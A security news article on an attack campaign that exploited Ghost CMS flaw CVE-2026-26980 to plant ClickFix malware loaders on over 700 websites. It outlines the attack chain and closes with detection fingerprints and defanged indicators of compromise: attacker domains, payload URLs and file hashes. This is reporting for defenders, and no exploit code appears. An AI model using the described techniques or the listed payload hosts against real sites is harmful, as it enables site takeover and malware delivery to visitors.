Hackers Exploit Ghost CMS CVE-2026-26980 to Poison 700 Websites With ClickFix Malware

HomeCyber Security News Hackers Exploit Ghost CMS CVE-2026-26980 to Poison 700 Websites With ClickFix Malware By Tushar Subhra Dutta May 26, 2026 A critical SQL injection flaw in Ghost CMS has been weaponized by at least two threat actor groups to silently poison over 700 websites with ClickFix malware, putting unsuspecting visitors at serious risk. The vulnerability, tracked as CVE-2026-26980, was publicly disclosed as early as February 19, 2026. Despite this, many Ghost CMS administrators failed to apply the available patch in time. Attackers wasted little time, scanning for unpatched installations, stealing Admin API keys, and mass-modifying article content to serve malicious JavaScript loaders to anyone who visited those sites. Researchers at Qianxin XLab first detected the poisoning activity on May 7, 2026, while investigating a compromise at one of their critical customers.  Qianxin said in a report shared with Cyber Security News that what initially appeared to be a targeted intrusion turned out to be a broad, automated campaign hitting Ghost CMS installations worldwide. The attack chain was described as systematic, covering CMS takeover, page poisoning, two-stage payload loading, social engineering, and final malware delivery. Malwareremoval software The scope of damage expanded rapidly. By May 10, researchers had confirmed 156 poisoned domains. One week later, that number had ballooned to over 700, including websites operated by Harvard University, Oxford University, and Auburn University. The affected sites span dozens of industries including blockchain, AI, media, fintech, and security research. What makes this campaign particularly dangerous is the level of trust users place in well-known websites. Visitors to compromised Ghost sites had no visible warning signs. Ghost CMS Poisoning Incident Timeline (Source – Qianxin) The poisoned articles looked completely normal, with the malicious code silently embedded at the bottom of each page, waiting to activate when a reader scrolled through. Hackers Exploit Ghost CMS CVE-2026-26980 The vulnerability at the center of this campaign is a high-risk SQL injection flaw in Ghost CMS that allows unauthenticated attackers to read directly from the database, including the Admin API Key. With that key in hand, attackers could call the Ghost Admin API to silently rewrite articles at scale, with no need to touch the admin panel or the server directly. CVE ID Type Severity Affected Component Impact CVE-2026-26980 SQL Injection High Ghost CMS Unauthenticated Admin API Key extraction, mass article modification Once the malicious JavaScript loader was planted, the attack unfolded in four stages. Stage one dropped the loader at the bottom of articles. Stage two redirected real visitors through a cloaking script that filtered out security researchers and bots. Dataprotection services More than 700 domains that have been poisoned (Source – Qianxin) Stage three presented a convincing fake Cloudflare verification page, tricking users into pressing WIN+R, pasting a command, and hitting Enter. Stage four silently delivered and executed a data-stealing payload on the victim’s machine. ClickFix Social Engineering and Payload Delivery The fake verification page is what makes this campaign so effective against ordinary users. It mimics the widely recognized Cloudflare CAPTCHA interface down to the visual styling and wording. When users click to verify, they unknowingly copy a malicious command to their clipboard and execute it themselves, all while believing they are simply proving they are human. The payloads evolved as the campaign progressed. Early versions downloaded a DLL named installer.dll via a public CDN and launched it quietly using rundll32. By May 16, attackers had upgraded to a zero-detection data-stealing Trojan called UtilifySetup.exe, which used an Electron-based framework to establish persistence and contact a command-and-control server every 30 seconds. Attack Chain (Source – Qianxin) A second threat actor group was also found running a parallel campaign through a loader delivered via NotepadPlusPlus.zip. Qianxin XLab strongly recommends that all Ghost CMS administrators upgrade immediately to the patched version that resolves CVE-2026-26980. Beyond upgrading, site owners should rotate all credentials including Admin API keys and administrator passwords, audit access logs for unusual bulk PUT requests, and scan article content for fingerprints such as ghost_once_footer_ or atob( combined with appendChild. Visitors who may have accessed any affected Ghost site during the contamination window should run a full local security check on their devices. Indicators of Compromise (IoCs):- Type Indicator Description Domain clo4shara[.]xyz Threat Actor A – Stage 2 cloaking domain (first wave) Domain cloud-verification[.]com Threat Actor A – Fake Cloudflare verification page host Domain jalwat[.]com Threat Actor A – Payload distribution server Domain com-apps[.]cc Threat Actor A – Updated cloaking domain and payload host Domain web-telegram[.]ug Threat Actor A – C2 server for UtilifySetup.exe (beacons every 30s) Domain staticcloudflare[.]pro Threat Actor B – Malicious CSS loader host Domain script-dev[.]digital Threat Actor B – Malicious CSS loader host Domain script-dev[.]buzz Threat Actor B – Associated domain Domain updatesecurity[.]pro Threat Actor B – Associated domain Domain updatefilescf[.]top Threat Actor B – Associated domain Domain static-file[.]digital Threat Actor B – Associated domain Domain download-file[.]today Threat Actor B – Associated domain Domain updatefile-cf[.]digital Threat Actor B – Associated domain Domain script-dev[.]xyz Threat Actor B – Associated domain Domain cdnupdatenews[.]top Threat Actor B – Final payload download host URL https://clo4shara[.]xyz/11z77u3.php Threat Actor A – Stage 2 cloaking PHP script URL https://com-apps[.]cc/11z77u3.php Threat Actor A – Updated Stage 2 cloaking PHP script URL https://platecrumbs[.]com/11z77u3.php Threat Actor A – Alternate cloaking PHP script URL https://cloud-verification[.]com/update.zip Threat Actor A – Malicious ZIP payload URL https://com-apps[.]cc/update.zip Threat Actor A – Malicious ZIP payload (updated) URL https://com-apps[.]cc/NotepadPlusPlus.zip Threat Actor A – NotepadPlusPlus lure ZIP payload URL https://jalwat[.]com/static/uploads/campaigns/6/update.zip Threat Actor A – Early payload ZIP (May 7) URL https://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll Threat Actor A – NotepadPlusPlus DLL download URL URL https://staticcloudflare[.]pro/api/css.js Threat Actor B – Malicious JavaScript loader URL https://script-dev[.]digital/api/css.js Threat Actor B – Malicious JavaScript loader URL https://cdnupdatenews[.]top/dl?fid=38 Threat Actor B – Final payload download URL MD5 Hash 5659292833ec421da11ebde005d9c9a8 installer.dll – Stage 1 Rust DLL loader (May 7-9) MD5 Hash d30cc10d54ebc967c8538ff74f442eee NotepadPlusPlus.dll – Stage 2 Rust DLL loader (May 16+) MD5 Hash 18a7251ddde77ed24bc54700d84d9be1 UtilifySetup.exe – Inno Setup Electron-based data-stealing Trojan MD5 Hash f280e12f51f996dae7fffc64a56ee527 SuperAppizeSetup.msi – Associated installer MD5 Hash fceca579efcef09eb507c6ca977ea281 css.js – Threat Actor B malicious JavaScript loader File Name installer.dll Rust-based DLL loader dropped to %TEMP% File Name update.bat Batch script for payload execution File Name NotepadPlusPlus.dll Renamed installer DLL (Stage 2) File Name UtilifySetup.exe Final Electron-based data-stealing Trojan payload File Name notepadplusplus.js JavaScript variant of loader (May 18 wave) IP Address 144.31.236.66 Threat Actor B – Resolved by staticcloudflare[.]pro and script-dev[.]digital Injected Code Pattern ghost_once_footer_ Threat Actor A – Fingerprint in poisoned article content Injected Code Pattern sj.ssc/ipa/ Threat Actor B – Fingerprint in poisoned article content Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Mini Shai-Hulud Compromises @antv npm Packages to Steal CI/CD Credentials Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems KnowledgeDeliver LMS Zero-Day Exploited to Deploy BLUEBEAM Web Shell ConnectWise Automate Vulnerability Let Attackers Bypass Security Checks Hackers Hide Linux Payload Under SSH-Like Filename During Package Installation Latest News Cyber Security News NightSpire Ransomware Uses RDP Access and Remote Admin Tools for Stealthy Persistence Cyber Security News GitHub Down – Authentication Issues Denying Access to Actions  Cyber Security News Windows Server 2016 Domain Controller May Fail with 15-Character Hostname Cyber Security News Hackers Use SEO Poisoning to Impersonate Gemini CLI and Claude Code Installers Cyber Security News Critical Memcached SASL Vulnerability Let Attackers Infer Valid Usernames